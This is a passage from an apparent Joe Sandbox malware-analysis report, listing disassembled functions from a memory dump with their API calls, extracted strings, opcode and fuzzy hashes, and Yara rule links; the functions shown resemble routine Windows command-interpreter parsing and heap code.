                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: A
                                        • API String ID: 3731854180-3554254475
                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                        • Instruction ID: 1d990b80358f498c4672fffeeb28a5c0cea5f9e3c1ac3af7e69fda931794c4dc
                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                        • Instruction Fuzzy Hash: 56A18E21B0D64286E660BF52A45067DFBA5FB997A1F808035CF6D47798FF3CA641CB20
                                        Function 00007FF7CD4A9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Enum$Openwcsrchr
                                        • String ID: %s=%s$.$\Shell\Open\Command
                                        • API String ID: 3402383852-1459555574
                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                        • Instruction ID: 9e12b4513baa89788baad19acefcc0558cac7d0340b6862465f0231dc8299744
                                        • Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
                                        • Instruction Fuzzy Hash: 0FA1A121B0CA8292EA10AF5594542BAE2A1EF85BA0FC44531DF6E477C5FF7CEB41C720
                                        Function 00007FF7CD48F173 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F0D6
                                        • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1BA
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F1E7
                                        • iswdigit.MSVCRT(00000000,00000000,?,00000000,?,00007FF7CD48E626,?,?,00000000,00007FF7CD491F69), ref: 00007FF7CD48F1FF
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD491F69,?,?,?,?,?,?,?,00007FF7CD48286E,00000000,00000000,00000000,00000000), ref: 00007FF7CD48F2BB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit$iswspacewcschr
                                        • String ID: )$=,;
                                        • API String ID: 1959970872-2167043656
                                        • Opcode ID: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                        • Instruction ID: 6bcf1149b944bafa013992cc192756b1a2e1c34b72672c5466ac9a603eedd6cc
                                        • Opcode Fuzzy Hash: 4f4e76ffb3d3d3f1682d86852f25dc45ca8acbfdb86516db9a39298bef1f035d
                                        • Instruction Fuzzy Hash: 70419E61F0C65285FBA4AF15A914379F6E0AF507B1FC45032CFAD821A4FF3CA6818B20
                                        Function 00007FF7CD4ABA40 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                        • String ID: %04X-%04X$:
                                        • API String ID: 930873262-1938371929
                                        • Opcode ID: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction ID: 605c9909c0d798856cc884d61a1ebd0fb24614ba40a70aa1788e081a40a54bd4
                                        • Opcode Fuzzy Hash: 1b48387342add1d7daed67bb80fe16c2eacc5f7ab2e1033d601e8994222be5e6
                                        • Instruction Fuzzy Hash: ED416121B0CA82D2E760AF65E4542BAF2A1FB85764FC04136DF6E426D5EF3CE645C720
                                        Function 00007FF7CD4936EC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 93fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: FileWrite$ByteCharMultiWide$_get_osfhandle
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                        • API String ID: 3249344982-2616576482
                                        • Opcode ID: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction ID: b2b052761bee8f90e345300f186ced72426a92be806872f36e1bcebb518d5385
                                        • Opcode Fuzzy Hash: 51d05573790b3cf5d3d64b049944166340f1b2bbc10c5d821001f089b8cff74b
                                        • Instruction Fuzzy Hash: A8417072A1CA4186E7109F12A844739FAA6FB99FA4F888234DF5907794DF3CD2148B10
                                        Function 00007FF7CD496A28 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • iswdigit.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A73
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496A91
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AB0
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496AE3
                                        • wcschr.MSVCRT(?,?,00000000,00007FF7CD4968A3,?,?,?,?,?,?,?,00000000,?,00007FF7CD4963F3), ref: 00007FF7CD496B01
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcschr$iswdigit
                                        • String ID: +-~!$<>+-*/%()|^&=,
                                        • API String ID: 2770779731-632268628
                                        • Opcode ID: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction ID: a9853a7cba4e009d46bb94343a1f46c920237e00af50becf4b256b6b1526955a
                                        • Opcode Fuzzy Hash: 04afb1219d2367be7b294e05ecf67b56e7fd74584ee28e872d0024d55c3108eb
                                        • Instruction Fuzzy Hash: B8316C3270CE6685EA50AF52E450678B6A5FB59F94B858035DF6E03354FF3CE600C720
                                        Function 00007FF7CD491630 Relevance: 10.7, APIs: 7, Instructions: 208memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491673
                                        • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49168D
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491757
                                        • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49176E
                                        • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD491788
                                        • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,?,00007FF7CD4914D6,?,?,?,00007FF7CD48AA22,?,?,?,00007FF7CD48847E), ref: 00007FF7CD49179C
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$Process$Alloc$Size
                                        • String ID:
                                        • API String ID: 3586862581-0
                                        • Opcode ID: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction ID: 3bb158a453407c2897abf5b9603a865e848544f43cfe243c414fe228f80c7f2d
                                        • Opcode Fuzzy Hash: de24f60fade2ea1a8e9170476ea6e59d916578871a0233016ef2ac0a8793df42
                                        • Instruction Fuzzy Hash: DA916F61B0DA4281EA14AF16A444678F7A6FB54BA1F998136DF6D037A0FF3CE641C320
                                        Function 00007FF7CD4986F0 Relevance: 10.7, APIs: 7, Instructions: 154COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
                                        • String ID:
                                        • API String ID: 1313749407-0
                                        • Opcode ID: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction ID: 1bcc4565639b50edae71209ecfe99b6331be8da80bf3fd050cb50811b1912ebd
                                        • Opcode Fuzzy Hash: ee6218c461c646e929341b9db92bfc99d61f95d83b881389c5cff3e0ca217c2e
                                        • Instruction Fuzzy Hash: E751A222B0C68292EE10BF169904579E69ABF55BB0F884170DF3E073D5FF3CEA408620
                                        Function 00007FF7CD4ABE30 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsicmpwcschr$Heap$AllocProcessiswspace
                                        • String ID: KEYS$LIST$OFF
                                        • API String ID: 411561164-4129271751
                                        • Opcode ID: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction ID: 28cd1575d557dd362f7db2d9c961e1dcfadb03c1ce529aa67a9ce272c1ce7969
                                        • Opcode Fuzzy Hash: 9fd236f794765471c688532a78fffa23d2b2533206d05d2e386dcf7da8b9c818
                                        • Instruction Fuzzy Hash: 35215E20B0CA02A1FA54BF65E855175F6A1EB947B0FC49231DF3E462E5FE3CDA448720
                                        Function 00007FF7CD48E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswdigit
                                        • String ID: GeToken: (%x) '%s'
                                        • API String ID: 3849470556-1994581435
                                        • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction ID: 72e36a48bb84eaddc38185d121e35f763a2659c3a4269981e8cbe25e57be3e05
                                        • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                                        • Instruction Fuzzy Hash: 58517C31B0C64285EB64AF56E848579B7A0BB54BA4F848435DF6D87390FF7EEA40C720
                                        Function 00007FF7CD495EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$CurrentDirectorytowupper
                                        • String ID:
                                        • API String ID: 1403193329-0
                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction ID: 0fcfa3307ff4dbbda2110518a452ff0ce924fee45b8b523715cccf9ba5964ff0
                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction Fuzzy Hash: B551C126B0D68185EB24EF22D844AB9B7A6EF49778F858035CF2D07694FF3CD6448720
                                        Function 00007FF7CD482A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$_setjmp
                                        • String ID:
                                        • API String ID: 3883041866-0
                                        • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction ID: 65374a5faea3d53b147426f37c97d3e50fa5b4fa4847c500818b607f916edf65
                                        • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction Fuzzy Hash: 8D514F3270CB868AEB619F21D8803EAB7A4EB45798F804135DB5D87A49EF3CD744CB10
                                        Function 00007FF7CD4AE558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                        • String ID:
                                        • API String ID: 2123716050-0
                                        • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction ID: 9a7bec5cd8569f6ded2cb1598561de662fa46c3a069cd096dc2a2ca4466bc0e2
                                        • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction Fuzzy Hash: C141A032709AC28AEB71AF21D8843E9B795EB4979CF844134DF5D4AA98EF3CD3448710
                                        Function 00007FF7CD4932E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00007FF7CD4933A8: iswspace.MSVCRT(?,?,00000000,00007FF7CD4AD6EE,?,?,?,00007FF7CD4A0632), ref: 00007FF7CD4933C0
                                        • iswspace.MSVCRT(?,?,?,00007FF7CD4932A4), ref: 00007FF7CD49331C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239096724.00007FF7CD4D4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239176210.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: iswspace
                                        • String ID: off
                                        • API String ID: 2389812497-733764931
                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction ID: d305a1a1a0268bea4ddc89bdcc00ed2e0d549eb27ecbcc99dc7c8d3852e8bdfd
                                        • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction Fuzzy Hash: 9A219421B0C64291FA70AF579458679F697EF46BA0FCC8034DF6E47690FE2CE6408321
                                        Function 00007FF7CD4A9308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1239041350.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000006.00000002.1239019582.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000006.00000002.1239076010.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmpDownload File
